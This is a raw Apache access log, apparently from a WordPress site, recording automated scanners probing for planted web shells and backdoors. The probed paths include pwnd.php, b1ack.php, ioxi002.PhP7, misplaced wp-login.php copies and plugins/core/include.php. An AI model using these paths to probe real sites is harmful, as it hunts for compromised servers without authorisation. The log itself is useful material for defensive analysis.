103.132.181.183 - - [07/Apr/2025:23:03:14 -0300] "GET /wp-login.php HTTP/1.1" 200 305 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:03:24 -0300] "GET /epinyins.php HTTP/1.1" 403 303 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:03:39 -0300] "GET /wp-seo.php HTTP/1.1" 403 46924 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:05:36 -0300] "GET /class-db.php HTTP/1.1" 403 46924 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:05:37 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46924 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:07:47 -0300] "GET /simple.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force"
198.204.240.42 - - [07/Apr/2025:23:09:27 -0300] "GET /index.php?params=1 HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
198.204.240.42 - - [07/Apr/2025:23:09:27 -0300] "GET /index.php?params=1 HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:09:30 -0300] "GET /ioxi002.PhP7 HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:09:36 -0300] "GET /ynz.PhP7 HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:09:39 -0300] "GET /themes.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:42 -0300] "GET / HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:43 -0300] "GET / HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:09:43 -0300] "GET /erin1.PhP7 HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:44 -0300] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:45 -0300] "GET /xmlrpc.php?rsd HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:46 -0300] "GET / HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:47 -0300] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:09:47 -0300] "GET /fosil.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:48 -0300] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:49 -0300] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:50 -0300] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:51 -0300] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:09:51 -0300] "GET /ws.php.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:52 -0300] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:53 -0300] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:54 -0300] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:55 -0300] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:56 -0300] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:57 -0300] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:09:57 -0300] "GET /ws.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:58 -0300] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:09:59 -0300] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
103.133.143.229 - - [07/Apr/2025:23:09:59 -0300] "GET //x.php/ HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
3.111.245.94 - - [07/Apr/2025:23:10:00 -0300] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:10:01 -0300] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:10:01 -0300] "GET /wp-admin/user/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
3.111.245.94 - - [07/Apr/2025:23:10:02 -0300] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:10:06 -0300] "GET /wp-includes/images/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:10:11 -0300] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:10:15 -0300] "GET /wp-admin/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:10:19 -0300] "GET /wp-includes/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.133.143.229 - - [07/Apr/2025:23:10:22 -0300] "GET //x.php/ HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
103.132.181.183 - - [07/Apr/2025:23:10:24 -0300] "GET /cgi-bin/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:10:30 -0300] "GET /.wp-cli/wp-login.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:10:37 -0300] "GET /wp-content/uploads/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
63.141.250.58 - - [07/Apr/2025:23:11:07 -0300] "GET /index.php?params=1 HTTP/1.1" 200 46924 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:15 -0300] "GET /ioxi002.PhP7 HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:19 -0300] "GET /ynz.PhP7 HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:23 -0300] "GET /themes.php HTTP/1.1" 403 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:26 -0300] "GET /erin1.PhP7 HTTP/1.1" 200 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:30 -0300] "GET /fosil.php HTTP/1.1" 403 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:34 -0300] "GET /ws.php.php HTTP/1.1" 403 46951 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:39 -0300] "GET /ws.php HTTP/1.1" 403 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:42 -0300] "GET /wp-admin/user/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:46 -0300] "GET /wp-includes/images/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:49 -0300] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:51 -0300] "GET /wp-admin/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:56 -0300] "GET /wp-includes/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:13:57 -0300] "GET /wp-content/uploads/wpr-addons/forms/b1ack.php HTTP/1.1" 200 46923 "-" "{random}"
103.132.181.183 - - [07/Apr/2025:23:13:59 -0300] "GET /cgi-bin/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:14:03 -0300] "GET /.wp-cli/wp-login.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:14:04 -0300] "GET /class-db.php HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:14:05 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:14:06 -0300] "GET /wp-content/uploads/wp-login.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:14:47 -0300] "GET /simple.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force"
173.208.148.34 - - [07/Apr/2025:23:18:21 -0300] "GET /index.php?params=1 HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
173.208.148.34 - - [07/Apr/2025:23:19:21 -0300] "GET /index.php?params=1 HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:23:09 -0300] "GET /class-db.php HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:23:10 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
172.176.89.217 - - [07/Apr/2025:23:24:58 -0300] "GET /sts.php HTTP/1.1" 403 46923 "-" "-"
149.154.161.196 - - [07/Apr/2025:23:25:17 -0300] "GET /sts.php HTTP/1.1" 403 46923 "-" "TelegramBot (like TwitterBot)"
103.132.181.183 - - [07/Apr/2025:23:26:33 -0300] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:26:45 -0300] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:27:03 -0300] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 200 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:27:15 -0300] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 200 46951 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
45.148.10.174 - - [07/Apr/2025:23:31:20 -0300] "GET / HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0"
194.238.24.238 - - [07/Apr/2025:23:31:37 -0300] "GET /class-db.php HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:31:37 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:38:17 -0300] "GET /wp-content/uploads/wpr-addons/forms/b1ack.php HTTP/1.1" 200 46923 "-" "{random}"
103.132.181.183 - - [07/Apr/2025:23:39:17 -0300] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 200 46952 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
167.86.78.198 - - [07/Apr/2025:23:40:55 -0300] "GET /bk/index.php HTTP/1.1" 200 46952 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:42:02 -0300] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 200 46980 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
52.170.69.215 - - [07/Apr/2025:23:43:08 -0300] "GET /erin1.PhP7 HTTP/1.1" 200 46952 "-" "-"
149.154.161.248 - - [07/Apr/2025:23:44:02 -0300] "GET /erin1.PhP7 HTTP/1.1" 200 46953 "-" "TelegramBot (like TwitterBot)"
194.238.24.238 - - [07/Apr/2025:23:45:48 -0300] "GET /class-db.php HTTP/1.1" 403 46953 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:45:49 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46953 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:46:48 -0300] "GET /class-db.php HTTP/1.1" 403 46952 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:46:49 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46952 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
112.98.27.231 - - [07/Apr/2025:23:47:45 -0300] "GET / HTTP/1.1" 200 46952 "http://qualidadedosonocolchoes.com.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.8800734.69 Safari/537.36"
63.141.250.58 - - [07/Apr/2025:23:47:54 -0300] "GET /index.php?params=1 HTTP/1.1" 200 46952 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:49:52 -0300] "GET /class-db.php HTTP/1.1" 403 46952 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:49:53 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46952 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:50:07 -0300] "GET /class-db.php HTTP/1.1" 403 46952 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:23:50:09 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46952 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
198.204.240.42 - - [07/Apr/2025:23:55:37 -0300] "GET /index.php?params=1 HTTP/1.1" 200 46952 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
41.216.188.209 - - [07/Apr/2025:23:56:39 -0300] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 200 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.208.236.138 - - [08/Apr/2025:00:04:27 -0300] "GET / HTTP/1.1" 200 326752 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.208.236.138 - - [08/Apr/2025:00:04:27 -0300] "GET / HTTP/1.1" 200 327019 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.208.236.138 - - [08/Apr/2025:00:04:28 -0300] "GET /000897866325406.html HTTP/1.1" 200 308016 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
